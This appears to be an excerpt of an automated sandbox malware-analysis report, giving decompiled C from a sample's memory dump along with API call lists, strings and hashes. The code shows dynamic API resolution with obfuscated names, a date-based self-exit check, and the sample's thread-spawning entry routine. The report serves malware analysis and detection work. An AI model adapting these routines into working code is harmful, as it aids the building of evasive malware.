					 *0x41a95c = GetProcAddress(_t239, _t50);
					_t328 =  *0x41a710; // 0x2e33648
					_t52 =  *0x41aa34; // 0x73da0000
					 *0x41aa18 = GetProcAddress(_t52, _t328);
					_t240 =  *0x41a510; // 0x2e49248
					_t329 =  *0x41aa34; // 0x73da0000
					 *0x41a900 = GetProcAddress(_t329, _t240);
					_t55 =  *0x41a35c; // 0x2e33588
					_t241 =  *0x41aa34; // 0x73da0000
					 *0x41a8e0 = GetProcAddress(_t241, _t55);
					_t330 =  *0x41a524; // 0x2e492e8
					_t57 =  *0x41aa34; // 0x73da0000
					 *0x41a8c0 = GetProcAddress(_t57, _t330);
					_t242 =  *0x41a0a0; // 0x2e4a930
					_t331 =  *0x41aa34; // 0x73da0000
					_t17 = GetProcAddress(_t331, _t242);
					 *0x41aa60 = _t17;
				}
				if( *0x41aa80 != 0) {
					_t41 =  *0x41a2fc; // 0x2e4a9f0
					_t235 =  *0x41aa80; // 0x6fa90000
					 *0x41a9c8 = GetProcAddress(_t235, _t41);
					_t324 =  *0x41a508; // 0x2e4aa08
					_t43 =  *0x41aa80; // 0x6fa90000
					 *0x41a924 = GetProcAddress(_t43, _t324);
					_t236 =  *0x41a540; // 0x2e335c8
					_t325 =  *0x41aa80; // 0x6fa90000
					 *0x41aa30 = GetProcAddress(_t325, _t236);
					_t46 =  *0x41a214; // 0x2e4af40
					_t237 =  *0x41aa80; // 0x6fa90000
					 *0x41a888 = GetProcAddress(_t237, _t46);
					_t326 =  *0x41a794; // 0x2e4af60
					_t48 =  *0x41aa80; // 0x6fa90000
					 *0x41a99c = GetProcAddress(_t48, _t326);
					_t238 =  *0x41a7d0; // 0x2e4a888
					_t327 =  *0x41aa80; // 0x6fa90000
					_t17 = GetProcAddress(_t327, _t238);
					 *0x41aa08 = _t17;
				}
				if( *0x41a968 != 0) {
					_t37 =  *0x41a178; // 0x2e4a9a8
					_t233 =  *0x41a968; // 0x76720000
					 *0x41aa4c = GetProcAddress(_t233, _t37);
					_t322 =  *0x41a69c; // 0x2e49bc8
					_t39 =  *0x41a968; // 0x76720000
					 *0x41a89c = GetProcAddress(_t39, _t322);
					_t234 =  *0x41a0e4; // 0x2e4a9c0
					_t323 =  *0x41a968; // 0x76720000
					_t17 = GetProcAddress(_t323, _t234);
					 *0x41a90c = _t17;
				}
				if( *0x41aa98 != 0) {
					_t34 =  *0x41a270; // 0x2e4b140
					_t232 =  *0x41aa98; // 0x75390000
					 *0x41aa00 = GetProcAddress(_t232, _t34);
					_t321 =  *0x41a378; // 0x2e4a858
					_t36 =  *0x41aa98; // 0x75390000
					_t17 = GetProcAddress(_t36, _t321);
					 *0x41aa84 = _t17;
				}
				if( *0x41a938 != 0) {
					_t226 =  *0x41a3cc; // 0x2e49310
					_t316 =  *0x41a938; // 0x73660000
					 *0x41a8dc = GetProcAddress(_t316, _t226);
					_t23 =  *0x41a2a0; // 0x2e4b0a0
					_t227 =  *0x41a938; // 0x73660000
					 *0x41a928 = GetProcAddress(_t227, _t23);
					_t317 =  *0x41a308; // 0x2e49568
					_t25 =  *0x41a938; // 0x73660000
					 *0x41a9e8 = GetProcAddress(_t25, _t317);
					_t228 =  *0x41a150; // 0x2e4a870
					_t318 =  *0x41a938; // 0x73660000
					 *0x41aa2c = GetProcAddress(_t318, _t228);
					_t28 =  *0x41a4f4; // 0x2e4a8d0
					_t229 =  *0x41a938; // 0x73660000
					 *0x41aa0c = GetProcAddress(_t229, _t28);
					_t319 =  *0x41a7c8; // 0x2e4af20
					_t30 =  *0x41a938; // 0x73660000
					 *0x41a9b8 = GetProcAddress(_t30, _t319);
					_t230 =  *0x41a380; // 0x2e4b040
					_t320 =  *0x41a938; // 0x73660000
					 *0x41a8f0 = GetProcAddress(_t320, _t230);
					_t33 =  *0x41a7b8; // 0x2e4a8a0
					_t231 =  *0x41a938; // 0x73660000
					_t17 = GetProcAddress(_t231, _t33);
					 *0x41aa7c = _t17;
				}
				if( *0x41a97c != 0) {
					_t314 =  *0x41a174; // 0x2e4b060
					_t20 =  *0x41a97c; // 0x747d0000
					 *0x41a98c = GetProcAddress(_t20, _t314);
					_t225 =  *0x41a3d8; // 0x2e4ae80
					_t315 =  *0x41a97c; // 0x747d0000
					_t17 = GetProcAddress(_t315, _t225);
					 *0x41a884 = _t17;
				}
				if( *0x41aa88 != 0) {
					_t18 =  *0x41a448; // 0x2e4a960
					_t224 =  *0x41aa88; // 0x6ecd0000
					_t19 = GetProcAddress(_t224, _t18);
					 *0x41a990 = _t19;
					return _t19;
				}
				return _t17;
			}

0x0040c4aa
0x0040c4b0
0x0040c4b6
0x0040c4c3
0x0040c4c8
0x0040c4cf
0x0040c4db
0x0040c4e0
0x0040c4e7
0x0040c4f4
0x0040c4f9
0x0040c4ff
0x0040c50c
0x0040c511
0x0040c518
0x0040c524
0x0040c529
0x0040c530
0x0040c53d
0x0040c542
0x0040c548
0x0040c555
0x0040c55a
0x0040c561
0x0040c56d
0x0040c572
0x0040c579
0x0040c586
0x0040c58b
0x0040c591
0x0040c59e
0x0040c5a3
0x0040c5aa
0x0040c5b6
0x0040c5bb
0x0040c5c2
0x0040c5cf
0x0040c5d4
0x0040c5da
0x0040c5e7
0x0040c5ec
0x0040c5f3
0x0040c5ff
0x0040c604
0x0040c60b
0x0040c618
0x0040c61d
0x0040c623
0x0040c630
0x0040c635
0x0040c63c
0x0040c648
0x0040c64d
0x0040c654
0x0040c661
0x0040c666
0x0040c66c
0x0040c679
0x0040c67e
0x0040c685
0x0040c691
0x0040c696
0x0040c69d
0x0040c6aa
0x0040c6af
0x0040c6b5
0x0040c6c2
0x0040c6c7
0x0040c6ce
0x0040c6da
0x0040c6df
0x0040c6e6
0x0040c6f3
0x0040c6f8
0x0040c6fe
0x0040c70b
0x0040c710
0x0040c717
0x0040c723
0x0040c728
0x0040c72f
0x0040c73c
0x0040c741
0x0040c747
0x0040c754
0x0040c759
0x0040c760
0x0040c76c
0x0040c771
0x0040c778
0x0040c785
0x0040c78a
0x0040c790
0x0040c79d
0x0040c7a2
0x0040c7a9
0x0040c7b5
0x0040c7ba
0x0040c7c1
0x0040c7ce
0x0040c7d3
0x0040c7d9
0x0040c7e6
0x0040c7eb
0x0040c7f2
0x0040c7fe
0x0040c803
0x0040c80a
0x0040c817
0x0040c81c
0x0040c822
0x0040c82f
0x0040c834
0x0040c83b
0x0040c847
0x0040c84c
0x0040c853
0x0040c860
0x0040c865
0x0040c86b
0x0040c878
0x0040c87d
0x0040c884
0x0040c890
0x0040c895
0x0040c89c
0x0040c8a9
0x0040c8ae
0x0040c8b4
0x0040c8c1
0x0040c8c6
0x0040c8cd
0x0040c8d9
0x0040c8de
0x0040c8e5
0x0040c8f2
0x0040c8f7
0x0040c8fd
0x0040c90a
0x0040c90f
0x0040c916
0x0040c922
0x0040c927
0x0040c92e
0x0040c93b
0x0040c940
0x0040c946
0x0040c953
0x0040c958
0x0040c95f
0x0040c96b
0x0040c970
0x0040c977
0x0040c984
0x0040c98e
0x0040c99a
0x0040c9a4
0x0040c9b1
0x0040c9bb
0x0040c9c8
0x0040c9d2
0x0040c9de
0x0040c9e8
0x0040c9f5
0x0040c9f5
0x0040c9fa
0x0040ca07
0x0040ca0c
0x0040ca12
0x0040ca18
0x0040ca1d
0x0040ca2a
0x0040ca2f
0x0040ca3c
0x0040ca41
0x0040ca47
0x0040ca4d
0x0040ca52
0x0040ca59
0x0040ca5f
0x0040ca64
0x0040ca6b
0x0040ca71
0x0040ca76
0x0040ca7c
0x0040ca82
0x0040ca87
0x0040ca8e
0x0040ca94
0x0040ca99
0x0040caa0
0x0040caa6
0x0040caab
0x0040cab1
0x0040cab7
0x0040cabc
0x0040cac3
0x0040cac9
0x0040cace
0x0040cad5
0x0040cadb
0x0040cae7
0x0040cae9
0x0040caef
0x0040cafc
0x0040cb06
0x0040cb13
0x0040cb1d
0x0040cb23
0x0040cb29
0x0040cb29
0x0040cb35
0x0040cb3b
0x0040cb42
0x0040cb4f
0x0040cb54
0x0040cb5a
0x0040cb67
0x0040cb6c
0x0040cb73
0x0040cb7f
0x0040cb84
0x0040cb8b
0x0040cb98
0x0040cb9d
0x0040cba3
0x0040cbb0
0x0040cbb5
0x0040cbbc
0x0040cbc8
0x0040cbcd
0x0040cbd4
0x0040cbe1
0x0040cbe6
0x0040cbec
0x0040cbf9
0x0040cbfe
0x0040cc05
0x0040cc11
0x0040cc1b
0x0040cc22
0x0040cc28
0x0040cc28
0x0040cc34
0x0040cc3a
0x0040cc41
0x0040cc4d
0x0040cc52
0x0040cc59
0x0040cc66
0x0040cc6b
0x0040cc71
0x0040cc7e
0x0040cc83
0x0040cc8a
0x0040cc96
0x0040cc9b
0x0040cca2
0x0040ccaf
0x0040ccb4
0x0040ccba
0x0040ccc7
0x0040cccc
0x0040ccd3
0x0040ccdf
0x0040cce4
0x0040cceb
0x0040ccf8
0x0040ccfd
0x0040cd03
0x0040cd10
0x0040cd15
0x0040cd1c
0x0040cd28
0x0040cd2d
0x0040cd34
0x0040cd3b
0x0040cd41
0x0040cd41
0x0040cd4d
0x0040cd53
0x0040cd59
0x0040cd66
0x0040cd6b
0x0040cd72
0x0040cd7e
0x0040cd83
0x0040cd8a
0x0040cd97
0x0040cd9c
0x0040cda2
0x0040cdaf
0x0040cdb4
0x0040cdbb
0x0040cdc7
0x0040cdd1
0x0040cdd8
0x0040cdde
0x0040cdde
0x0040cdea
0x0040cdf0
0x0040cdf7
0x0040ce03
0x0040ce08
0x0040ce0f
0x0040ce1c
0x0040ce21
0x0040ce27
0x0040ce34
0x0040ce39
0x0040ce40
0x0040ce4c
0x0040ce51
0x0040ce58
0x0040ce65
0x0040ce6a
0x0040ce70
0x0040ce7d
0x0040ce82
0x0040ce89
0x0040ce95
0x0040ce9a
0x0040cea1
0x0040ceae
0x0040ceb3
0x0040ceb9
0x0040cec6
0x0040cecb
0x0040ced2
0x0040cede
0x0040cee3
0x0040ceea
0x0040cef7
0x0040cefc
0x0040cf02
0x0040cf0f
0x0040cf14
0x0040cf1b
0x0040cf27
0x0040cf2c
0x0040cf33
0x0040cf3a
0x0040cf40
0x0040cf40
0x0040cf4c
0x0040cf4e
0x0040cf54
0x0040cf5b
0x0040cf61
0x0040cf61
0x0040cf6d
0x0040cf6f
0x0040cf76
0x0040cf7c
0x0040cf82
0x0040cf82
0x0040cf8e
0x0040cf90
0x0040cf97
0x0040cf9e
0x0040cfa4
0x0040cfa4
0x0040cfb0
0x0040cfb6
0x0040cfbc
0x0040cfc9
0x0040cfce
0x0040cfd5
0x0040cfe1
0x0040cfe6
0x0040cfed
0x0040cffa
0x0040cfff
0x0040d005
0x0040d012
0x0040d017
0x0040d01e
0x0040d02a
0x0040d02f
0x0040d036
0x0040d03d
0x0040d043
0x0040d043
0x0040d04f
0x0040d055
0x0040d05b
0x0040d068
0x0040d06d
0x0040d074
0x0040d080
0x0040d085
0x0040d08c
0x0040d099
0x0040d09e
0x0040d0a4
0x0040d0b1
0x0040d0b6
0x0040d0bd
0x0040d0c9
0x0040d0ce
0x0040d0d5
0x0040d0dc
0x0040d0e2
0x0040d0e2
0x0040d0ee
0x0040d0f0
0x0040d0f6
0x0040d103
0x0040d108
0x0040d10f
0x0040d11b
0x0040d120
0x0040d127
0x0040d12e
0x0040d134
0x0040d134
0x0040d140
0x0040d142
0x0040d148
0x0040d155
0x0040d15a
0x0040d161
0x0040d167
0x0040d16d
0x0040d16d
0x0040d179
0x0040d17f
0x0040d186
0x0040d193
0x0040d198
0x0040d19e
0x0040d1ab
0x0040d1b0
0x0040d1b7
0x0040d1c3
0x0040d1c8
0x0040d1cf
0x0040d1dc
0x0040d1e1
0x0040d1e7
0x0040d1f4
0x0040d1f9
0x0040d200
0x0040d20c
0x0040d211
0x0040d218
0x0040d225
0x0040d22a
0x0040d230
0x0040d237
0x0040d23d
0x0040d23d
0x0040d249
0x0040d24b
0x0040d252
0x0040d25e
0x0040d263
0x0040d26a
0x0040d271
0x0040d277
0x0040d277
0x0040d283
0x0040d285
0x0040d28b
0x0040d292
0x0040d298
0x00000000
0x0040d298
0x0040d29e

APIs

GetProcAddress.KERNEL32(74DF0000,02E4A0D8), ref: 0040C4BD
GetProcAddress.KERNEL32(74DF0000,02E49FD0), ref: 0040C4D5
GetProcAddress.KERNEL32(74DF0000,02E33168), ref: 0040C4EE
GetProcAddress.KERNEL32(74DF0000,02E49E68), ref: 0040C506
GetProcAddress.KERNEL32(74DF0000,02E49F70), ref: 0040C51E
GetProcAddress.KERNEL32(74DF0000,02E49EF8), ref: 0040C537
GetProcAddress.KERNEL32(74DF0000,02E49F10), ref: 0040C54F
GetProcAddress.KERNEL32(74DF0000,02E49F28), ref: 0040C567
GetProcAddress.KERNEL32(74DF0000,02E49FB8), ref: 0040C580
GetProcAddress.KERNEL32(74DF0000,02E4A168), ref: 0040C598
GetProcAddress.KERNEL32(74DF0000,02E4A198), ref: 0040C5B0
GetProcAddress.KERNEL32(74DF0000,02E4A1B0), ref: 0040C5C9
GetProcAddress.KERNEL32(74DF0000,02E4A180), ref: 0040C5E1
GetProcAddress.KERNEL32(74DF0000,02E33128), ref: 0040C5F9
GetProcAddress.KERNEL32(74DF0000,02E4A1F8), ref: 0040C612
GetProcAddress.KERNEL32(74DF0000,02E332C8), ref: 0040C62A
GetProcAddress.KERNEL32(74DF0000,02E495E0), ref: 0040C642
GetProcAddress.KERNEL32(74DF0000,02E4A1C8), ref: 0040C65B
GetProcAddress.KERNEL32(74DF0000,02E33288), ref: 0040C673
GetProcAddress.KERNEL32(74DF0000,02E4A1E0), ref: 0040C68B
GetProcAddress.KERNEL32(74DF0000,02E33188), ref: 0040C6A4
GetProcAddress.KERNEL32(74DF0000,02E4A210), ref: 0040C6BC
GetProcAddress.KERNEL32(74DF0000,02E4A150), ref: 0040C6D4
GetProcAddress.KERNEL32(74DF0000,02E4A810), ref: 0040C6ED
GetProcAddress.KERNEL32(74DF0000,02E4A630), ref: 0040C705
GetProcAddress.KERNEL32(74DF0000,02E32F28), ref: 0040C71D
GetProcAddress.KERNEL32(74DF0000,02E4A558), ref: 0040C736
GetProcAddress.KERNEL32(74DF0000,02E4A6A8), ref: 0040C74E
GetProcAddress.KERNEL32(74DF0000,02E4A5D0), ref: 0040C766
GetProcAddress.KERNEL32(74DF0000,02E33268), ref: 0040C77F
GetProcAddress.KERNEL32(74DF0000,02E4A5B8), ref: 0040C797
GetProcAddress.KERNEL32(74DF0000,02E4A618), ref: 0040C7AF
GetProcAddress.KERNEL32(74DF0000,02E4A840), ref: 0040C7C8
GetProcAddress.KERNEL32(74DF0000,02E4A708), ref: 0040C7E0
GetProcAddress.KERNEL32(74DF0000,02E4A720), ref: 0040C7F8
GetProcAddress.KERNEL32(74DF0000,02E335E8), ref: 0040C811
GetProcAddress.KERNEL32(74DF0000,02E334A8), ref: 0040C829
GetProcAddress.KERNEL32(74DF0000,02E4A660), ref: 0040C841
GetProcAddress.KERNEL32(74DF0000,02E4A690), ref: 0040C85A
GetProcAddress.KERNEL32(74DF0000,02E336C8), ref: 0040C872
GetProcAddress.KERNEL32(74DF0000,02E49540), ref: 0040C88A
GetProcAddress.KERNEL32(74DF0000,02E4A738), ref: 0040C8A3
GetProcAddress.KERNEL32(74DF0000,02E4A6C0), ref: 0040C8BB
GetProcAddress.KERNEL32(74DF0000,02E335A8), ref: 0040C8D3
GetProcAddress.KERNEL32(74DF0000,02E33428), ref: 0040C8EC
GetProcAddress.KERNEL32(74DF0000,02E33488), ref: 0040C904
GetProcAddress.KERNEL32(74DF0000,02E4A7E0), ref: 0040C91C
GetProcAddress.KERNEL32(74DF0000,02E334C8), ref: 0040C935
GetProcAddress.KERNEL32(74DF0000,02E4A6D8), ref: 0040C94D
GetProcAddress.KERNEL32(74DF0000,02E33388), ref: 0040C965
GetProcAddress.KERNEL32(74DF0000,02E33688), ref: 0040C97E
GetProcAddress.KERNEL32(74DF0000,CreateThread), ref: 0040C994
GetProcAddress.KERNEL32(74DF0000,GetEnvironmentVariableA), ref: 0040C9AB
GetProcAddress.KERNEL32(74DF0000,SetEnvironmentVariableA), ref: 0040C9C2
GetProcAddress.KERNEL32(74DF0000,lstrcpyA), ref: 0040C9D8
GetProcAddress.KERNEL32(74DF0000,lstrcpynA), ref: 0040C9EF
LoadLibraryA.KERNEL32(02E4A090,?,00406BAD), ref: 0040CA01
LoadLibraryA.KERNELBASE(02E4A108,?,00406BAD), ref: 0040CA12
LoadLibraryA.KERNEL32(02E4A0C0,?,00406BAD), ref: 0040CA24
LoadLibraryA.KERNEL32(02E4A048,?,00406BAD), ref: 0040CA36
LoadLibraryA.KERNELBASE(02E49F88,?,00406BAD), ref: 0040CA47
LoadLibraryA.KERNELBASE(02E49FE8,?,00406BAD), ref: 0040CA59
LoadLibraryA.KERNELBASE(02E49FA0,?,00406BAD), ref: 0040CA6B
LoadLibraryA.KERNELBASE(02E4A060,?,00406BAD), ref: 0040CA7C
LoadLibraryA.KERNELBASE(02E4A078,?,00406BAD), ref: 0040CA8E
LoadLibraryA.KERNELBASE(02E4A0F0,?,00406BAD), ref: 0040CAA0
LoadLibraryA.KERNELBASE(02E49F40,?,00406BAD), ref: 0040CAB1
LoadLibraryA.KERNELBASE(02E4A138,?,00406BAD), ref: 0040CAC3
LoadLibraryA.KERNELBASE(02E49E50,?,00406BAD), ref: 0040CAD5
GetProcAddress.KERNEL32(775E0000,02E49B78), ref: 0040CAF6
GetProcAddress.KERNEL32(775E0000,memset), ref: 0040CB0D
GetProcAddress.KERNEL32(775E0000,memcpy), ref: 0040CB23
GetProcAddress.KERNEL32(6FC40000,02E4A750), ref: 0040CB49
GetProcAddress.KERNEL32(6FC40000,02E33448), ref: 0040CB61
GetProcAddress.KERNEL32(6FC40000,02E334E8), ref: 0040CB79
GetProcAddress.KERNEL32(6FC40000,02E33608), ref: 0040CB92
GetProcAddress.KERNEL32(6FC40000,02E4A7C8), ref: 0040CBAA
GetProcAddress.KERNEL32(6FC40000,02E336A8), ref: 0040CBC2
GetProcAddress.KERNEL32(6FC40000,02E333A8), ref: 0040CBDB
GetProcAddress.KERNEL32(6FC40000,02E33328), ref: 0040CBF3
GetProcAddress.KERNEL32(6FC40000,02E333C8), ref: 0040CC0B
GetProcAddress.KERNEL32(6FC40000,InternetCrackUrlA), ref: 0040CC22
GetProcAddress.KERNEL32(768F0000,02E4A5A0), ref: 0040CC47
GetProcAddress.KERNEL32(768F0000,02E4A678), ref: 0040CC60
GetProcAddress.KERNEL32(768F0000,02E33348), ref: 0040CC78
GetProcAddress.KERNEL32(768F0000,02E33568), ref: 0040CC90
GetProcAddress.KERNEL32(768F0000,02E4A7F8), ref: 0040CCA9
GetProcAddress.KERNEL32(768F0000,02E49AD8), ref: 0040CCC1
GetProcAddress.KERNEL32(768F0000,02E33368), ref: 0040CCD9
GetProcAddress.KERNEL32(768F0000,02E333E8), ref: 0040CCF2
GetProcAddress.KERNEL32(768F0000,02E4A588), ref: 0040CD0A
GetProcAddress.KERNEL32(768F0000,02E4A7B0), ref: 0040CD22
GetProcAddress.KERNEL32(768F0000,02E4A6F0), ref: 0040CD3B
GetProcAddress.KERNEL32(74B40000,02E4A768), ref: 0040CD60
GetProcAddress.KERNEL32(74B40000,02E33408), ref: 0040CD78
GetProcAddress.KERNEL32(74B40000,02E4A780), ref: 0040CD91
GetProcAddress.KERNEL32(74B40000,02E33508), ref: 0040CDA9
GetProcAddress.KERNEL32(74B40000,02E4A798), ref: 0040CDC1
GetProcAddress.KERNEL32(74B40000,RegGetValueA), ref: 0040CDD8
GetProcAddress.KERNEL32(76B90000,02E4A648), ref: 0040CDFD
GetProcAddress.KERNEL32(76B90000,02E4A828), ref: 0040CE16
GetProcAddress.KERNEL32(76B90000,02E33628), ref: 0040CE2E
GetProcAddress.KERNEL32(76B90000,02E33548), ref: 0040CE46
GetProcAddress.KERNEL32(76B90000,02E4A570), ref: 0040CE5F
GetProcAddress.KERNEL32(76B90000,02E49BA8), ref: 0040CE77
GetProcAddress.KERNEL32(76B90000,02E4A5E8), ref: 0040CE8F
GetProcAddress.KERNEL32(76B90000,02E4A600), ref: 0040CEA8
GetProcAddress.KERNEL32(76B90000,02E4A9D8), ref: 0040CEC0
GetProcAddress.KERNEL32(76B90000,02E4A918), ref: 0040CED8
GetProcAddress.KERNEL32(76B90000,02E49BB8), ref: 0040CEF1
GetProcAddress.KERNEL32(76B90000,02E33468), ref: 0040CF09
GetProcAddress.KERNEL32(76B90000,02E4A900), ref: 0040CF21
GetProcAddress.KERNEL32(76B90000,02E4A990), ref: 0040CF3A
GetProcAddress.KERNELBASE(6EAB0000,02E48E70), ref: 0040CF5B
GetProcAddress.KERNEL32(768E0000,02E33668), ref: 0040CF7C
GetProcAddress.KERNEL32(749A0000,02E33528), ref: 0040CF9E
GetProcAddress.KERNEL32(73DA0000,02E495B8), ref: 0040CFC3
GetProcAddress.KERNEL32(73DA0000,02E33648), ref: 0040CFDB
GetProcAddress.KERNEL32(73DA0000,02E49248), ref: 0040CFF4
GetProcAddress.KERNEL32(73DA0000,02E33588), ref: 0040D00C
GetProcAddress.KERNEL32(73DA0000,02E492E8), ref: 0040D024
GetProcAddress.KERNEL32(73DA0000,02E4A930), ref: 0040D03D
GetProcAddress.KERNEL32(6FA90000,02E4A9F0), ref: 0040D062
GetProcAddress.KERNEL32(6FA90000,02E4AA08), ref: 0040D07A
GetProcAddress.KERNEL32(6FA90000,02E335C8), ref: 0040D093
GetProcAddress.KERNEL32(6FA90000,02E4AF40), ref: 0040D0AB
GetProcAddress.KERNEL32(6FA90000,02E4AF60), ref: 0040D0C3
GetProcAddress.KERNEL32(6FA90000,02E4A888), ref: 0040D0DC
GetProcAddress.KERNEL32(76720000,02E4A9A8), ref: 0040D0FD
GetProcAddress.KERNEL32(76720000,02E49BC8), ref: 0040D115
GetProcAddress.KERNEL32(76720000,02E4A9C0), ref: 0040D12E
GetProcAddress.KERNEL32(75390000,02E4B140), ref: 0040D14F
GetProcAddress.KERNEL32(75390000,02E4A858), ref: 0040D167
GetProcAddress.KERNEL32(73660000,02E49310), ref: 0040D18D
GetProcAddress.KERNEL32(73660000,02E4B0A0), ref: 0040D1A5
GetProcAddress.KERNEL32(73660000,02E49568), ref: 0040D1BD
GetProcAddress.KERNEL32(73660000,02E4A870), ref: 0040D1D6
GetProcAddress.KERNEL32(73660000,02E4A8D0), ref: 0040D1EE
GetProcAddress.KERNEL32(73660000,02E4AF20), ref: 0040D206
GetProcAddress.KERNEL32(73660000,02E4B040), ref: 0040D21F
GetProcAddress.KERNEL32(73660000,02E4A8A0), ref: 0040D237
GetProcAddress.KERNEL32(747D0000,02E4B060), ref: 0040D258
GetProcAddress.KERNEL32(747D0000,02E4AE80), ref: 0040D271
GetProcAddress.KERNEL32(6ECD0000,02E4A960), ref: 0040D292

Strings

RegGetValueA, xrefs: 0040CDCC
memset, xrefs: 0040CB01
memcpy, xrefs: 0040CB18
SetEnvironmentVariableA, xrefs: 0040C9B6
lstrcpyA, xrefs: 0040C9CD
InternetCrackUrlA, xrefs: 0040CC16
CreateThread, xrefs: 0040C989
lstrcpynA, xrefs: 0040C9E3
GetEnvironmentVariableA, xrefs: 0040C99F

Memory Dump Source

Source File: 00000017.00000002.412367036.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.412493181.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_EC9F.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: CreateThread$GetEnvironmentVariableA$InternetCrackUrlA$RegGetValueA$SetEnvironmentVariableA$lstrcpyA$lstrcpynA$memcpy$memset
API String ID: 2238633743-3231020739
Opcode ID: 5c6a11f3020753ac3d423ac2ff1df36a17615fb2ca3194d898380672604674f4
Instruction ID: 9bcd284fde1af5afdb9725a1d8ee7eb933c8521e96d2c529a01ce852b5064599
Opcode Fuzzy Hash: 5c6a11f3020753ac3d423ac2ff1df36a17615fb2ca3194d898380672604674f4
Instruction Fuzzy Hash: 9C820FF9523200EFC345DFA8EE889D637B9BB4C251715CA39E509C3661D73894A1CF2A

Uniqueness

Uniqueness Score: -1.00%

Function 02D2003C, Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02D2024D

Strings

kernel32.dll, xrefs: 02D2008F, 02D20095
cess, xrefs: 02D2018D

Memory Dump Source

Source File: 00000017.00000002.412955259.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d20000_EC9F.jbxd

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: 1bc5c981d6fea912fcc7dcc340e60fde74e519195c6ec5c7e407c243dd4fdd56
Instruction ID: cfa7d5a6cf6e8122d8f8b4b86fa142e17fe7a4fac549fd98c2e419cbe1e8dec4
Opcode Fuzzy Hash: 1bc5c981d6fea912fcc7dcc340e60fde74e519195c6ec5c7e407c243dd4fdd56
Instruction Fuzzy Hash: 90525A74A01229DFDB64CF58C984BA8BBB1BF19309F1480D9E54DAB351DB30AE89DF14

Uniqueness

Uniqueness Score: -1.00%

Function 004068F0, Relevance: 9.1, APIs: 6, Instructions: 75
timestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E004068F0(void* __ecx, void* __eflags) {
				struct _FILETIME _v12;
				struct _FILETIME _v20;
				char _v284;
				struct _SYSTEMTIME _v300;
				struct _SYSTEMTIME _v316;
				int _t45;
				char* _t52;
				intOrPtr _t57;
				void* _t66;

				E0040B720( &_v284, 0x104);
				_v300.wYear = 0;
				_v300.wMonth = 0;
				_v300.wDay = 0;
				_v300.wMinute = 0;
				_v300.wMilliseconds = 0;
				_v316.wYear = 0;
				_v316.wMonth = 0;
				_v316.wDay = 0;
				_v316.wMinute = 0;
				_v316.wMilliseconds = 0;
				_v20.dwLowDateTime = 0;
				_v20.dwHighDateTime = 0;
				_v12.dwLowDateTime = 0;
				_v12.dwHighDateTime = 0;
				GetSystemTime( &_v300);
				_t57 =  *0x41a60c; // 0x2e331e8
				 *0x41aa24( &_v284, _t57);
				_t52 =  *0x41a104; // 0x2e33108
				sscanf( &_v284, _t52,  &(_v316.wDay),  &(_v316.wMonth),  &_v316,  &(_v316.wHour),  &(_v316.wMinute),  &(_v316.wSecond));
				SystemTimeToFileTime( &_v300,  &_v20);
				_t45 = SystemTimeToFileTime( &_v316,  &_v12);
				_t66 = _v20.dwHighDateTime - _v12.dwHighDateTime;
				if(_t66 >= 0 && (_t66 > 0 || _v20.dwLowDateTime > _v12.dwLowDateTime)) {
					ExitProcess(0); // executed
				}
				return _t45;
			}

0x00406905
0x0040690c
0x00406915
0x0040691b
0x00406921
0x00406927
0x00406930
0x00406939
0x0040693f
0x00406945
0x0040694b
0x00406952
0x0040695b
0x0040695e
0x00406967
0x00406971
0x00406977
0x00406985
0x004069b5
0x004069c3
0x004069d7
0x004069e8
0x004069f1
0x004069f4
0x00406a02
0x00406a02
0x00406a0b

APIs

GetSystemTime.KERNEL32(?,?,00000104), ref: 00406971
lstrcat.KERNEL32(?,02E331E8), ref: 00406985
sscanf.NTDLL ref: 004069C3
SystemTimeToFileTime.KERNEL32(?,00000000), ref: 004069D7
SystemTimeToFileTime.KERNEL32(?,00000000), ref: 004069E8
ExitProcess.KERNEL32 ref: 00406A02

Memory Dump Source

Source File: 00000017.00000002.412367036.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.412493181.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_EC9F.jbxd

Similarity

API ID: Time$System$File$ExitProcesslstrcatsscanf
String ID:
API String ID: 2797641603-0
Opcode ID: 7d7e2839d62a1b1f45abe4f978373fb08f06d061ffb6add98bc378f3cfdedde8
Instruction ID: e1bd8726115975e68c113ba4c939dbea9fdba7e28f8895f6eace496917ca047b
Opcode Fuzzy Hash: 7d7e2839d62a1b1f45abe4f978373fb08f06d061ffb6add98bc378f3cfdedde8
Instruction Fuzzy Hash: A531AEB5D1121CABCB58DF94DD85ADEB7B9AF48300F0085EAE10AA3150EB345B94CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00406B60, Relevance: 6.0, APIs: 4, Instructions: 49
threadsleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			_entry_() {
				void* _t5;
				void* _t8;
				void* _t9;
				void* _t10;
				void* _t16;

				E0040C290(_t16); // executed
				E00401770(); // executed
				E0040C2E0(); // executed
				E00401050(_t16, 0x3e8); // executed
				_t5 = E00406AA0(); // executed
				_t19 = _t5;
				if(_t5 != 0) {
					_t8 = E00406AF0(_t19); // executed
					if(_t8 == 0) {
						_t9 = E00406A10(); // executed
						if(_t9 != 0) {
							_t10 = E00406B30(); // executed
							_t22 = _t10;
							if(_t10 != 0) {
								E00401940(); // executed
								E0040C4A0(); // executed
								CreateThread(0, 0, E00401020, 0, 0, 0); // executed
								E004068F0(_t16, _t22); // executed
								CreateThread(0, 0, E00406650, 0, 0, 0);
							}
						}
					}
				}
				while(1 != 0) {
					if( *0x41abb4 == 0) {
						Sleep(0x3e7);
						continue;
					}
					break;
				}
				E0040BFA0(_t16);
				ExitProcess(0);
			}

0x00406b63
0x00406b68
0x00406b6d
0x00406b77
0x00406b7f
0x00406b84
0x00406b86
0x00406b88
0x00406b8f
